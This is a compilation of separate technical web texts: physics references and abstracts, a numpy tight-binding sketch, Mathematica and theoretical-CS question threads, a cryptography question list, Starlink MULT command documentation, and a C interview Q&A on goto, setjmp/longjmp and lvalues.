[9] Sun, J., Xu, L. and Zhang, J. (2020) Electronic Structure and Transport Properties of Graphene/h-BN Controlled by Boundary Potential and Magnetic Field. Modern Physics Letters B, 34, Article ID: 2050180. https://doi.org/10.1142/S0217984920501808
[10] Li, X., Xu, L. and Zhang, J. (2020) Band Structure and Transport Property of Graphene/h-BN Heterostructure under Local Potentials. Chinese Journal of Physics (Taipei), 65, 75-81. https://doi.org/10.1016/j.cjph.2020.02.011
[11] Kane, C.L. and Mele, E.J. (2005) Quantum Spin Hall Effect in Graphene. Physical Review Letters, 95, Article ID: 226801. https://doi.org/10.1103/PhysRevLett.95.226801
[12] Kane, C.L. and Mele, E.J. (2005) Z2 Topological Order and the Quantum Spin Hall Effect. Physical Review Letters, 95, Article ID: 146802. https://doi.org/10.1103/PhysRevLett.95.146802
[13] Sheng, D.N., Weng, Z.Y., Sheng, L., et al. (2006) Quantum Spin Hall Effect and Topologically Invariant Chern Numbers. Physical Review Letters, 97, Article ID: 036808. https://doi.org/10.1103/PhysRevLett.97.036808
[14] Sheng, L., Sheng, D.N., Ting, C.S., et al. (2005) Nondissipative Spin Hall Effect via Quantized Edge Transport. Physical Review Letters, 95, Article ID: 136602. https://doi.org/10.1103/PhysRevLett.95.136602
[15] Prodan, E. (2009) Robustness of the Spin-Chern Number. Physical Review B, 80, Article ID: 125327. https://doi.org/10.1103/PhysRevB.80.125327
[16] Sheng, L., Sheng, D.N. and Ting, C.S. (2005) Spin-Hall Effect in Two-Dimensional Electron Systems with Rashba Spin-Orbit Coupling and Disorder. Physical Review Letters, 94, Article ID: 016602. https://doi.org/10.1103/PhysRevLett.94.016602
[17] Bernevig, B.A. and Zhang, S.-C. (2006) Quantum Spin Hall Effect. Physical Review Letters, 96, Article ID: 106802. https://doi.org/10.1103/PhysRevLett.96.106802
[18] Xu, L., Zhou, Y. and Gong, C.D. (2013) Topological Phase Transition Induced by Spin-Orbit Coupling in Bilayer Graphene. Journal of Physics: Condensed Matter, 25, Article ID: 335503. https://doi.org/10.1088/0953-8984/25/33/335503
[19] Ren, Y., Qiao, Z. and Niu, Q. (2016) Topological Phases in Two-Dimensional Materials: A Review. Reports on Progress in Physics, 79, Article ID: 066501. https://doi.org/10.1088/0034-4885/79/6/066501
[20] Chen, T.W., Xiao, Z.R., Chiou, D.W., et al. (2011) High Chern Number Quantum Anomalous Hall Phases in Single-Layer Graphene with Haldane Orbital Coupling. Physical Review B, 84, Article ID: 165453. https://doi.org/10.1103/PhysRevB.84.165453
[21] Wang, E., Lu, X., Ding, S., Yao, W., Yan, M., Wan, G., et al. (2016) Gaps Induced by Inversion Symmetry Breaking and Second-Generation Dirac Cones in Graphene/Hexagonal Boron Nitride. Nature Physics, 12, 1111-1115. https://doi.org/10.1038/nphys3856
[22] Yang, W., Chen, G., Shi, Z., Liu, C.-C., Zhang, L., Xie, G., et al. (2013) Epitaxial Growth of Single-Domain Graphene on Hexagonal Boron Nitride. Nature Materials, 12, 792-797. https://doi.org/10.1038/nmat3695
[23] Gorbachev, R.V., Song, J.C.W., Yu, G.L., Kretinin, A.V., Withers, F., Cao, Y., et al. (2014) Detecting Topological Currents in Graphene Superlattices. Science, 346, 448-451. https://doi.org/10.1126/science.1254966
[24] Den Nijs, M. (1984) Quantized Hall Conductance in a Two Dimensional Periodic Potential. Physica A: Statistical Mechanics and Its Applications, 124, 199-210. https://doi.org/10.1016/0378-4371(84)90239-5
[25] Kohmoto, M. (1985) Topological Invariant and the Quantization of the Hall Conductance. Annals of Physics, 160, 343-354. https://doi.org/10.1016/0003-4916(85)90148-4
[26] Hatsugai, Y. (1993) Chern Number and Edge States in the Integer Quantum Hall Effect. Physical Review Letters, 71, 3697-3700. https://doi.org/10.1103/PhysRevLett.71.3697
[27] Chang, M.C. and Niu, Q. (1995) Berry Phase, Hyperorbits, and the Hofstadter Spectrum. Physical Review Letters, 75, 1348-1351. https://doi.org/10.1103/PhysRevLett.75.1348
[28] Slawinska, J., Zasada, I., Kosinski, P., et al. (2010) Reversible Modifications of Linear Dispersion: Graphene between Boron Nitride Monolayers. Physical Review B: Condensed Matter, 82, Article ID: 085431. https://doi.org/10.1103/PhysRevB.82.085431
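To make the tight-binding construction in Eq. (1) concrete, here is a minimal numerical sketch — not the paper's model, and with purely illustrative parameter values rather than those of Table 1 — of the nearest-neighbor hopping term $-t_1 \sum_{\langle i,j \rangle} C_i^{\dagger} C_j$ on a finite open chain:

```python
import numpy as np

# Sketch (illustrative only): nearest-neighbor tight-binding Hamiltonian
# -t1 * sum_<i,j> c_i^dag c_j on an open 1D chain of n_sites sites,
# mirroring the first term of Eq. (1). Parameter values are arbitrary.

def chain_hamiltonian(n_sites, t1=2.6, onsite=0.0):
    """Dense real-symmetric Hamiltonian matrix for an open chain."""
    h = np.zeros((n_sites, n_sites))
    np.fill_diagonal(h, onsite)          # on-site potential V_i term
    for i in range(n_sites - 1):
        h[i, i + 1] = h[i + 1, i] = -t1  # hopping between neighbors
    return h

if __name__ == "__main__":
    h = chain_hamiltonian(8)
    # The chain is bipartite, so the spectrum is symmetric about zero.
    print(np.linalg.eigvalsh(h))
```

The full model adds the spin-orbit (second-neighbor) term, the interlayer hopping $t_{\perp}$ of Eq. (3), and the local potentials, but the matrix-assembly pattern is the same.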
http://ptsymmetry.net/?m=20130103
PT-Symmetric Hamiltonian Model and Dirac Equation in 1+1 dimensions

O. Yesiltas

In this article, we have introduced a \(\mathcal{PT}\)-symmetric non-Hermitian Hamiltonian model which is given as \(\hat{\mathcal{H}}=\omega (\hat{b}^{\dagger}\hat{b}+1/2)+ \alpha (\hat{b}^{2}-(\hat{b}^{\dagger})^{2})\), where \(\omega\) and \(\alpha\) are real constants, and \(\hat{b}\) and \(\hat{b}^{\dagger}\) are first-order differential operators. The Hermitian form of the Hamiltonian \(\hat{\mathcal{H}}\) is obtained by suitable mappings, and it is interrelated to the time-independent one-dimensional Dirac equation in the presence of a position-dependent mass. The Dirac equation is then reduced to a Schrödinger-like equation, and two new complex non-\(\mathcal{PT}\)-symmetric vector potentials are generated. We have obtained a real spectrum for these new complex vector potentials using the shape invariance method, and we have computed the real energy values numerically for specific values of the parameters.

http://arxiv.org/abs/1301.0205
Mathematical Physics (math-ph); Quantum Physics (quant-ph)
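The abstract's Hamiltonian is easy to inspect numerically. The sketch below — my own illustration, not from the paper, with arbitrary basis size and parameter values — builds \(\hat{\mathcal{H}}\) as a matrix in a truncated harmonic-oscillator number basis. The matrix is real but non-symmetric (non-Hermitian), so its eigenvalues a priori come in complex-conjugate pairs; PT symmetry is what suggests they can in fact be real.

```python
import numpy as np

# Sketch (not from the paper): H = omega*(b†b + 1/2) + alpha*(b² - (b†)²)
# in a truncated number basis |0>, ..., |dim-1>. Parameters are arbitrary.

def truncated_hamiltonian(omega=1.0, alpha=0.1, dim=60):
    # annihilation operator: b|n> = sqrt(n)|n-1>
    b = np.diag(np.sqrt(np.arange(1, dim)), k=1)
    bd = b.T                       # creation operator b†
    num = bd @ b                   # number operator b†b
    return omega * (num + 0.5 * np.eye(dim)) + alpha * (b @ b - bd @ bd)

if __name__ == "__main__":
    h = truncated_hamiltonian()
    # H is real but h != h.T, i.e. manifestly non-Hermitian.
    print(np.sort_complex(np.linalg.eigvals(h))[:5])
```

Truncation artifacts affect the high end of the spectrum, so only the low-lying eigenvalues of such a finite matrix should be trusted.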
https://mathematica.stackexchange.com/questions/89823/transform-a-vector-de-into-a-set-of-scalar-des
# Transform a vector DE into a set of scalar DEs [closed]

I have the vector equality:

```
{{a,b},{c,d}}.D[{x1[t],x2[t]},t]=={{e,f},{g,h}}.{u1[t],u2[t]}
```

I want to solve this using DSolve. How do I transform the above vector equality (automatically) into a list of 2 scalar equalities:

```
{a*x1'[t]+b*x2'[t]==e*u1[t]+f*u2[t], c*x1'[t]+d*x2'[t]==g*u1[t]+h*u2[t]}
```

Thanks!

• Thread[] ought to work. – J. M.'s discontentment Aug 3 '15 at 16:06
• @Guesswhoitis. Awesome, Thread[LHS==RHS] (pseudocode) worked! – space_voyager Aug 3 '15 at 16:10
• In recent versions of Mathematica, you do not have to transform the vector equation into a pair of scalar equations before solving it. Thus DSolve[{{a, b}, {c, d}}.D[{x1[t], x2[t]}, t] == {{e, f}, {g, h}}.{u1[t], u2[t]}, {x1[t], x2[t]}, t] works just fine as is, whether with "abstract" functions u1[t], u2[t] and symbolic coefficient matrices, or with specific functions and actual values in the coefficient matrices. – murray Aug 3 '15 at 16:18
• @SjoerdC.deVries can you provide a link please? – chris Aug 4 '15 at 6:48
• @chris It was rather difficult to find, but I believe I was alluding to this question. – Sjoerd C. de Vries Aug 4 '15 at 10:36
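For comparison outside Mathematica — a sketch of the same idea, not part of the original thread, with all names my own — the "thread the equality over components" trick can be reproduced in Python with SymPy by equating the matrix product row by row:

```python
import sympy as sp

# Sketch: turn the matrix ODE  A.x'(t) == B.u(t)  into a list of scalar
# equations, mimicking Mathematica's Thread[lhs == rhs].

t = sp.symbols("t")
a, b, c, d, e, f, g, h = sp.symbols("a b c d e f g h")
x1, x2, u1, u2 = (sp.Function(n) for n in ("x1", "x2", "u1", "u2"))

A = sp.Matrix([[a, b], [c, d]])
B = sp.Matrix([[e, f], [g, h]])
x = sp.Matrix([x1(t), x2(t)])
u = sp.Matrix([u1(t), u2(t)])

lhs = A * x.diff(t)   # column vector: (a x1' + b x2', c x1' + d x2')
rhs = B * u           # column vector: (e u1 + f u2, g u1 + h u2)

# "Threading" the equality over the two components:
scalar_eqs = [sp.Eq(lhs[i], rhs[i]) for i in range(2)]

for eq in scalar_eqs:
    print(eq)
```

As in the Mathematica comment above, SymPy's `dsolve` can also accept the system of equations directly, so the expansion step is mainly useful for inspecting or rearranging the equations.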
https://infoscience.epfl.ch/record/185753
# Diffuse gamma-ray constraints on dark matter revisited I: the impact of subhalos

We make a detailed analysis of the indirect diffuse gamma-ray signals from dark matter annihilation in the Galaxy. We include the prompt emission, as well as the emission from inverse Compton scattering whenever the annihilation products contain light leptons. We consider both the contribution from the smooth dark matter halo and that from substructures. The main parameters for the latter are the mass function index and the minimal subhalo mass. We use recent results from N-body simulations to set the most reasonable range of parameters, and find that the signal can be boosted by a factor ranging from 2 to 15 towards the Galactic poles, slightly more towards the Galactic anticenter, with an important dependence on the subhalo mass index. This uncertainty is however much less than that of the extragalactic signal studied in the literature. We derive upper bounds on the dark matter annihilation cross section using the isotropic gamma-ray emission measured by Fermi-LAT, for two directions in the sky, the Galactic anticenter and the Galactic pole(s). The former represents the lowest irreducible signal from dark matter annihilation, and the latter is robust as the astrophysical background, dominated by the hadronic contribution, is rather well established in that direction. Finally, we show how the knowledge of the minimal subhalo mass, which formally depends on the dark matter particle interactions with normal matter, can be used to derive the mass function index.
http://cstheory.stackexchange.com/questions
# All Questions

### Identifying ambiguities in inductively learned concepts
I'm looking at ways in which "ambiguities" can be identified in labeled training data by a system undergoing some sort of inductive learning process. Do you know if there is any literature on this ...

### Can we verify satisfiability of first order statements via saturation in sub-exponential time?
In first order logic, we can prove satisfiability several ways: Finite model generation, truthful monadic abstractions, and also saturation. With finite model generation techniques, we can verify the ...

### Bisection Width of a Mesh Topology
What is the bisection width of a q-dimensional mesh topology with one dimension having k nodes, where bisection width splits the network as evenly as possible into two sets (with a difference of at ...

### Alternating tree automata for arbitrary arity tree
Could alternating tree automata be used for recognizing set (language) of arbitrary-arity trees? More specifically, as an example: let $\Sigma = \{a,b,c\}$ - labels for tree nodes. Trees from $T$ ...

### example for context free language which satisfy the pumping lemma [on hold]
I'm a beginner to Automata Theory. I found this interesting topic pumping lemma. I know how to prove a language is not context free using the pumping lemma. But I didn't find any example for context free ...

### Quantum Computing & Ray Tracing Rendering Engines
As a non-expert in any of these fields, but out of interest, I have been looking into basic concepts of quantum computing. And I was wondering, taking the concept of ray tracing and rendering engines, ...

### Time complexity of a branching-and-bound algorithm
Theoretical computer scientists usually use branch-and-reduce algorithms to find exact solutions. The time complexity of such a branching algorithm is usually analyzed by the method of branching ...

### Karp reduction/many-one reduction [on hold]
Why is Karp reduction also called "many-one reduction"? What do the 'many' and the 'one' stand for? I tried looking at wikipedia and read some books but I did not find any explanation. I do understand ...

### Logics for timed resource control
I'm studying proof theory and I've seen that linear logic can be used as a way to control resource usage, since by propositions-as-types it is equivalent to the linear lambda calculus. Is there a ...

### Numerical eigenbasis for a unitary
Do you know what numerical software computes an eigenvector basis for a unitary matrix? Say I have a unitary matrix $U$. If its eigenvalues are simple (no multiplicities), then for instance Matlab ...

### How and why does the Recrypt function work?
The general approach presented by Craig Gentry in 2009 to create a fully-homomorphic encryption system is roughly the following: Create a scheme that can evaluate some functions (increasing the noise in ...

### How many maximization algorithms can we run at the same time on a simple (or super) computer? [on hold]
I have a maximization problem which consists of finding the max of $2^L$ elements. This can be done in $O(2^L)$. This problem can be decomposed into $L$ maximization problems, where solving problem ...

### Quantum algorithms for QED computations related to the fine structure constants
My question is about quantum algorithms for QED (quantum electrodynamics) computations related to the fine structure constants. Such computations (as explained to me) amount to computing Taylor-like ...

### "Snake" reconfiguration problem
While writing a small post on the complexity of the videogames Nibbler and Snake, I found that they both can be modeled as reconfiguration problems on planar graphs, and it seems unlikely that such ...

### Recognizing sequences sortable by transpositions?
While reading the post, Probability of generating a desired permutation by random swaps, by Scott, I got interested in this problem of sorting: Input: a sequence $A$ of $2N$ positive integers. ...

### How could God authenticate in one message?
Thought experiment: Which data could convince experts, beyond reasonable doubts, about their origin outside our universe? From which margin should an expert consider such a claim seriously? For ...

### Counting occurences of 'a' in a book faster than O(n)? [on hold]
I was asked the following question in an interview: How would you count the occurrences of character a in a 500-page book? For simplicity, assume that you are ...

### Low-degree testing in PCP Theorem using bivariate polynomials
I read about modifications of the low-degree test used in the (first) proof of the PCP theorem. The test used in the proof works over randomly chosen lines while modifications allow choosing random ...

### Pseudorandom generator for finite automata
Let $d$ be a constant. How can we provably construct a pseudorandom generator that fools $d$-state finite automata? Here, a $d$-state finite automaton has $d$ nodes, a start node, a set of nodes ...

### Recommendations for References on undecidability of First Order Logic
I am currently reading Computability and Logic by Boolos, Burgess and Jeffrey for the proof of "undecidability of first order logic". However, I find the notation a bit confusing. Can anyone recommend ...

### Lower bound on estimating $\sum_{k=1}^n a_k$ for non-increasing $(a_k)_k$
I'd like to know (related to this other question) if lower bounds were known for the following testing problem: one is given query access to a sequence of non-negative numbers $a_n \geq \dots\geq a_1$ ...

### Is there notation for converting a multi-set to a set?
Suppose we have a multi-set $S$. For example, $S = \{ 1,2,2,3 \}$. Suppose we also have a set $T$, e.g., $T=\{1,2,3\}$. I would like to say, compactly, that $S$, when its duplicates are removed, is ...

### Discrepancy of Hadamard type matrix
Let $H$ be the $\{-1,+1\}$ Hadamard matrix of size $2$ and $J$ be the same size all $1$ matrix. Let $W$ be $\frac{H+J}{2}$. Is the discrepancy of $W^{\otimes k}$ at most $\sqrt{k^{-1}}$?

### Subset sum solver. Worth continue working on this method? [on hold]
I have been working on a subset sum problem solver for some time. The implementation is an exact/exhaustive search solver. The variable determining the asymptotic growth rate is just $N$ (the ...

### Total number of spanning trees of a set of graphs with constraint
This is an extension of the question "Total number of spanning trees of a set of graphs". The original problem has been shown to be #P-complete. Now a new constraint is added to the problem. I have ...

### What is the relationship between regular, context free and computable language? [on hold]
Is there a diagram illustrating their relationships?

### Quick question: What does it mean for a language to be "recognized" by an automaton? [on hold]
I am not particularly familiar with the usage of "recognized" in English; can someone explain what it means for a language to be recognized by an automaton? Does it mean that the NFA, DFA, Pushdown or Turing ...

### Does $NP$-hardness of $c$-approximation (for some $c>1$) imply $APX$-hardness?
Assume that for a given minimization problem with only integer solutions, it is $NP$-hard to decide if the optimal solution is 5 or 6. I.e., a polynomial-time algorithm with an approximation ratio ...

### Concept of 'shape' in clustering
Is there any abstract definition for 'shapes' of a cluster? I am currently working on providing a set of axioms to study clustering. In my work, I have found a need for an abstract definition for ...

### What are the major research issues in distributed transactions?
Background: Transaction processing has been a traditional research topic in database theory. Nowadays distributed transactions are popularized by the large-scale distributed storage systems which ...

### Maximum weight "fair" matching
I'm interested in a variant of the maximum weight matching in a graph, which I call "Maximum Fair Matching". Assume that the graph is full (i.e. $E=V\times V$), has an even number of vertices, and that ...

### Implementation of Min Max Matching in Christofides algorithm for approximating TSP
How is the corresponding step of finding the minimum-cost perfect matching on the odd-degree nodes supposed to be implemented? The induced graph is not bipartite and all the algorithms I know for ...

### Examples of open problems solved through application of a theorem already known
Are there good examples of reasonable open problems in TCS that had an 'obvious' solution via application of a theorem found in mathematics probably found a few decades earlier but went unnoticed in ...

### Can typed lambda calculi express *all* algorithms below a given complexity?
I know that the complexity of most varieties of typed lambda calculi without the Y combinator primitive is bounded, i.e. only functions of bounded complexity can be expressed, with the bound becoming ...

### Are (empirical) Rademacher complexity always positive?
Rademacher complexity and empirical Rademacher complexity are used to provide an upper bound on the loss of solving a learning problem. That seems to imply that Rademacher complexity and empirical ...

### Is there a purely functional vector with O(1) access to the front and back but O(log n) concatenation?
Context: For fun and perhaps for actual use, I'm making my own programming language that would compile to Typed Racket, a statically-typed Lisp dialect. One of the major features I want to implement ...

The famous FTPL algorithm [1] is analyzing linear cost functions. Is there any generalized proof for nonlinear functions known? Note that in the last paragraph of [1] it says "It would be great to ...

### determining the max flow with only edge capacities from n/w with additional vertex capacities?
Let ((V, E); s, t; c) be an extended flow network where not only edge capacities, but also vertex capacities are constrained, i.e., c : E ∪ V → R^+_0 and a flow f : E → R^+_0 must satisfy, in ...

### FPTAS for bin packing
If an algorithm for bin packing has a guarantee of OPT(I)+log^2(OPT(I)), then there is a fully polynomial approximation scheme for this problem. I have to prove this statement, but I have no idea ...

### Finding a permutation $p$ of $x_1, x_2, \dots, x_n$ which maximises $\sum_{i=1}^{n-1}|x_{p_{i+1}}-x_{p_i}|$
Here is the algorithmic problem I'm trying to solve: Given a list of integers $x_1, x_2, \dots, x_n$ find a permutation $p_1, p_2, \dots, p_n \in [n]$ that maximises the sum ...

### What is known about matrix multiplication, and matrix circuits?
So I'm wondering, first off, where I can read up to get a feel for state-of-the-art matrix multiplication concepts. I'll try to be more specific: I'm wondering if there has been research on circuits ...

### Known algorithms for Graph isomorphism [closed]
What algorithms are known for the graph isomorphism problem? Can those algorithms be related to algorithms for other graph theoretical problems (e.g. subgraph problem, counting graph isomorphisms)?

### The relationship between QCMA and QMA in the Turing and Communication model
First, my background in computational complexity is still at a beginner level. A recent paper published by Klauck and Podder [KP14] shows for the first time an exponential gap between computing partial ...

### What is the state of the art research in analysing algorithms on GPU architectures?
I have found many papers on sequential algorithms that have been implemented and tested on GPU architectures. Each of these papers usually as a result contains the amount of speedup that was achieved ...

### Is Software Consist Weight [closed]
i am confuse about that Is software consist Weight or not? Regards, Arif

### Pygame Countdown time [closed]
Can anyone help me with creating a timer in pygame? I have a game where I would like to have a timer for someone to complete the game. this is what I have def countdown(countdown): for t ...

### Rate of convergence of graph-theoretic quantity to fractional graph-theoretic counterpart
Let $G^n$ denote the OR product of a graph with itself $n$ times, i.e. the graph which has an edge between distinct vertices $(v_1,v_2,\ldots,v_n)$ and $(u_1,u_2,\ldots,u_n)$ if there exists some $i$ ...

### What is the worst-case runtime complexity to transform a NFA to DFA via Rabin-Scott's power set construction?
What is the worst-case runtime complexity to transform a NFA to DFA via Rabin-Scott's power set construction? Why? Details: http://en.wikipedia.org/wiki/Powerset_construction states that the ...

I aim to solve the following puzzler I recently read: A toymaker is faced with a group of $|A|$ buyers for their stock of $|B|$ distinct toys. Each buyer can buy up to 3 toys if available for buying. ...
http://crypto.stackexchange.com/questions?page=18&sort=faq
# All Questions 254 views ### How feasible is word-level frequency analysis over English (or any language)? Say I have some black box which, given any English word, deterministically outputs a token for that word. Assume our black box is implemented using strong cryptography, i.e. the hardness of reversing ... 152 views ### Test Vectors for ciphers While implementing ciphers (/hash functions, ...), I often face this problem: Where to find test vectors for it; so that I can guarantee my program is correct. It is generally a tedious job to find ... 292 views ### True Random Number Generator by milliseconds per keystroke (TRNG-Kms) The simplest way to generate truly random numbers for OTP keys is to measure the time in milliseconds between each keystroke on a keyboard. The randomness depends on the user typing in various speeds. ... 125 views ### Associative standard cryptographic hash function I am looking for a standard hash function which satisfies the following property: A hash function $H(a,b) = F(h(a),h(b))$ with $h$ (within $F$) any standard cryptographic hash function and $F$ an ... 208 views ### Using PBKDF2 twice with different argument order I'm pretty sure this is a really bad approach (in theory), but one of my clients is doing this and I was wondering… How bad it is to perform pbkdf-2 in this way (with 2000 iterations)? ... 197 views ### What differences between Menezes–Vanstone ECC and ElGamal ECC? After researching ECC encryption, I found that we can use ElGamal cryptosystem with elliptic curve and can we use Menezes-Vanstone cryptosystem with elliptic curve. What is the essential difference ... 172 views ### When is it safe to not use authenticated encryption? I have read the post Why should I use Authenticated Encryption instead of just encryption? When is it safe to not use authenticated encryption? I assumed hard drive volume encryption or per file ... 163 views ### Is there a flaw in this ECC blind signature scheme? 
Recently I've found the following work on the internet: An ECC-Based Blind Signature Scheme The paper claims to be an ECDSA blind signature however it seems that their scheme has a flaw in it. The ... 88 views ### Does $i^n=j^n$ for $i, j \in GF(2^q)$ and $i \neq j$ for some $n<2^q-1$ Let $i, j \in GF(2^q)$ and $i \neq j$ and $i,j\neq0$. Is that possible that $i^n=j^n$ for some $n$ such that $0 < n < 2^q-1$? I am looking for a proof if the answer is no, or for a method to ... 256 views Trying to find related answer for a long time, but not convinced yet. What I am trying is to encrypt using RijndaelManaged. To create Key, I am passing password, ... 300 views ### Making my steganography code more hard to detect and crack I'm doing a college project about digital image steganography on MATLAB. So far i've been able to get the help i needed from cool guys on stackoverflow but i now need to make my algorithm more hard to ... 169 views ### How to attack this authentication protocol from “Cryptography: An introduction” Consider the following protocol (from the book "Cryptography: An introduction", by Nigel Smart): ... 312 views Consider the pairing $e: G_1*G_2 \to G_t$. Why we are mapping element from group $G_1$ and group $G_2$ to an element in $G_t$. How are they used in cryptography? What advantages do they provide? 416 views ### DES — Can I recover the key when I have both ciphertext and the plaintext? Given a message and DES encrypted form of said message, is it possible to efficiently compute the key used to encrypt the data? 163 views 448 views ### AES block cipher modes of operation have a project in which I have to implement an en/de-cryption structure using a standard AES block of 128-bits in VHDL and I think I'm a bit confused. So I'd like to ask some questions about AES and ... 
416 views ### Making counter (CTR) mode robust against application state loss Counter (CTR) mode, which is a block cipher mode of operation, has some desirable qualities (no padding, parallel encryption and decryption), but at the cost of failing badly when non-unique counter ... 250 views ### Reordering non-block-aligned parts with DES in ECB mode I was given a ciphertext file which was encrypted using DES in ECB mode. It is known that the plainttext that was encrypted has the following form: Each line of text consists of a payroll followed ... 477 views ### Where is the S-Box generated in Rijandel/AES? It's rather kind of lame questions, and I can't find good and clear explanation: In which step of Rijandel is S-box generated? Is the S-box reused in every round of cipher or is generated in every ... 797 views ### HMAC-SHA1 input size I know that the HMAC is a message authentication code that uses a cryptographic key in conjunction with a hash function (SHA1 , MD5, etc.). The HMAC output is 160 bits for HMAC-SHA160 and 256 bits for ... 194 views ### Does impersonating an SRP server give you enough information for an off-line dictionary attack? In a comment to an answer I wrote to another question, CodesInChaos wrote that: "Problem with SRP is that an attacker who impersonates a server learns the password hash, enabling offline search." ... 213 views ### Quadratic residuosity problem reduction to integer factorization How can one show how to reduce the quadratic residuosity problem to an integer factorization? 2k views ### Generating a secure random number in javascript What I am trying to do is generate a large (4096bit) random number in JavaScript that is cryptographically safe to use. My approach is the following: I am creating a ... 488 views 603 views ### What is “Blinding” used for in cryptography? What does "blinding" mean in cryptography, and where do we usually use it? Can you describe a sample implementation? 
200 views ### Probability that an attacker wins the discrete logarithm game when exponents are drawn from a subset Suppose $g$ is a generator of an order $p$ cyclic group in which discrete logarithm is hard and $p$ is a prime (i.e., given $g^x$ for a random $x \in \{0,1,\ldots, p-1\}$, it is hard to recover $x$ ... 244 views I've been looking at the weakness with plain/textbook RSA, where the same message is encrypted and sent to multiple destinations. In this case, it is possible to recover the message. Given that an ... 290 views ### Two step encryption Is there any asymmetric cryptography algorithm which will allow recursive encryption. ... 2k views ### Constructing RSA private key, given public key As part of a puzzle I was given an RSA 256-bit public key and an encrypted message. The key itself is very weak, having exponent e = 65537 and modulus N = ... 1k views ### Cracking the Beaufort cipher Is there any easy way to crack a Beaufort cipher? We have a Vigenère table, and are trying to guess the keyword. Any easier way? 561 views ### Key derivation from a random seed The main problem is to use a block cipher to generate a random key. I would like to generate 256-bits key which can be as random as possible. I generate it in the following way: Pick a plaintext ... 151 views ### The meaning of “scheme” This question is a bit different from other questions here, but I think it is suitable to correctly understand the terminology of cryptography. Consider the following two sets of terms: Encryption ...
https://starlink.eao.hawaii.edu/devdocs/sun95.htx/sun95ss119.html
### MULT

Multiplies two NDF data structures

#### Description:

The routine multiplies two NDF data structures pixel-by-pixel to produce a new NDF.

#### Usage:

mult in1 in2 out

#### Parameters:

##### IN1 = NDF (Read)

First NDF to be multiplied.

##### IN2 = NDF (Read)

Second NDF to be multiplied.

##### OUT = NDF (Write)

Output NDF to contain the product of the two input NDFs.

##### TITLE = LITERAL (Read)

The title for the output NDF. A null value will cause the title of the NDF supplied for Parameter IN1 to be used instead. [!]

#### Examples:

mult a b c

This multiplies the NDF called a by the NDF called b, to make the NDF called c. NDF c inherits its title from a.

mult out=c in1=a in2=b title="Normalised spectrum"

This multiplies the NDF called a by the NDF called b, to make the NDF called c. NDF c has the title "Normalised spectrum".

#### Notes:

If the two input NDFs have different pixel-index bounds, then they will be trimmed to match before being multiplied. An error will result if they have no pixels in common.
https://www.examveda.com/c-fundamental-question-and-answer-for-interview/?page=2
# C Fundamental Question and Answer for Interview

8. What is the difference between goto and longjmp() and setjmp()?

A goto statement implements a local jump of program execution, and the longjmp() and setjmp() functions implement a nonlocal, or far, jump of program execution. Generally, a jump in execution of any kind should be avoided because it is not considered good programming practice to use such statements as goto and longjmp in your program.

A goto statement simply bypasses code in your program and jumps to a predefined position. To use the goto statement, you give it a labeled position to jump to. This predefined position must be within the same function. You cannot implement gotos between functions. Here is an example of a goto statement:

    {
        int x;
        printf("Excuse me while I count to 5000...\n");
        x = 1;
        while (1)
        {
            printf("%d\n", x);
            if (x == 5000)
                goto all_done;
            else
                x = x + 1;
        }
    all_done:
        printf("Whew! That wasn't so bad, was it?\n");
    }

This example could have been written much better, avoiding the use of a goto statement. Here is an example of an improved implementation:

    void better_function(void)
    {
        int x;
        printf("Excuse me while I count to 5000...\n");
        for (x=1; x<=5000; x++)
            printf("%d\n", x);
        printf("Whew! That wasn't so bad, was it?\n");
    }

As previously mentioned, the longjmp() and setjmp() functions implement a nonlocal goto. When your program calls setjmp(), the current state of your program is saved in a structure of type jmp_buf. Later, your program can call the longjmp() function to restore the program's state as it was when you called setjmp(). Unlike the goto statement, the longjmp() and setjmp() functions do not need to be implemented in the same function. However, there is a major drawback to using these functions: your program, when restored to its previously saved state, will lose its references to any dynamically allocated memory between the longjmp() and the setjmp().
This means you will waste memory for every malloc() or calloc() you have implemented between your longjmp() and setjmp(), and your program will be horribly inefficient. It is highly recommended that you avoid using functions such as longjmp() and setjmp() because they, like the goto statement, are quite often an indication of poor programming practice. Here is an example of the longjmp() and setjmp() functions:

    #include <stdio.h>
    #include <setjmp.h>
    #include <stdlib.h>

    jmp_buf saved_state;

    void main(void);
    void call_longjmp(void);

    void main(void)
    {
        int ret_code;
        printf("The current state of the program is being saved...\n");
        ret_code = setjmp(saved_state);
        if (ret_code == 1)
        {
            printf("The longjmp function has been called.\n");
            printf("The program's previous state has been restored.\n");
            exit(0);
        }
        printf("I am about to call longjmp and\n");
        call_longjmp();
    }

    void call_longjmp(void)
    {
        longjmp(saved_state, 1);
    }

9. What is an lvalue?

An lvalue is an expression to which a value can be assigned. The lvalue expression is located on the left side of an assignment statement, whereas an rvalue is located on the right side of an assignment statement. Each assignment statement must have an lvalue and an rvalue. The lvalue expression must reference a storable variable in memory. It cannot be a constant. For instance, the following lines show a few examples of lvalues:

    int x;
    int* p_int;
    x = 1;
    *p_int = 5;

The variable x is an integer, which is a storable location in memory. Therefore, the statement x = 1 qualifies x to be an lvalue. Notice the second assignment statement, *p_int = 5. By using the * modifier to reference the area of memory that p_int points to, *p_int is qualified as an lvalue. In contrast, here are a few examples of what would not be considered lvalues:

    #define CONST_VAL 10
    int x;

    /* example 1 */
    1 = x;

    /* example 2 */
    CONST_VAL = 5;

In both statements, the left side of the statement evaluates to a constant value that cannot be changed because constants do not represent storable locations in memory.
Therefore, these two assignment statements do not contain lvalues and will be flagged by your compiler as errors.

10. Can an array be an lvalue?

Is an array an expression to which we can assign a value? The answer to this question is no, because an array is composed of several separate array elements that cannot be treated as a whole for assignment purposes. The following statement is therefore illegal:

    int x[5], y[5];
    x = y;

You could, however, use a for loop to iterate through each element of the array and assign values individually, such as in this example:

    int i;
    int x[5];
    int y[5];
    ...
    for (i=0; i<5; i++)
        x[i] = y[i];
    ...

Additionally, you might want to copy the whole array all at once. You can do so using a library function such as the memcpy() function, which is shown here:

    memcpy(x, y, sizeof(y));

It should be noted here that unlike arrays, structures can be treated as lvalues. Thus, you can assign one structure variable to another structure variable of the same type, such as this:

    typedef struct t_name
    {
        char last_name[25];
        char first_name[15];
        char middle_init[2];
    } NAME;
    ...
    NAME my_name, your_name;
    ...
    your_name = my_name;
    ...

In the preceding example, the entire contents of the my_name structure were copied into the your_name structure. This is essentially the same as the following line (note that, because my_name and your_name are structures rather than arrays, their addresses must be taken explicitly):

    memcpy(&your_name, &my_name, sizeof(your_name));

11. What is an rvalue?

An rvalue can be defined as an expression that can be assigned to an lvalue. The rvalue appears on the right side of an assignment statement. Unlike an lvalue, an rvalue can be a constant or an expression, as shown here:

    int x, y;
    x = 1;       /* 1 is an rvalue; x is an lvalue */
